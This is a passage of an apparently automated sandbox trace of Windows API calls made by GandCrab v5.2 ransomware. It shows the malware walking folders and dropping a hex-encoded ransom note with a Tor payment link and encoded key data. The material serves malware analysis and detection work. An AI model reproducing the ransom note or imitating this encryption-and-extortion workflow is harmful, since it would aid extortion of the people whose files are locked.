pbbqzkgm.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0088.439] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.439] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.440] lstrcmpW (lpString1="f_RDBNJa3K3oZw0f", lpString2=".") returned 1 [0088.440] lstrcmpW (lpString1="f_RDBNJa3K3oZw0f", lpString2="..") returned 1 [0088.440] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="f_RDBNJa3K3oZw0f" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f" [0088.440] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\" [0088.440] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0088.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.440] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0088.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.440] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0088.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.440] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0088.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0088.441] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0088.441] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.441] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.441] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\\\TITWMVJL-DECRYPT.txt") returned 68 [0088.441] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0088.441] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6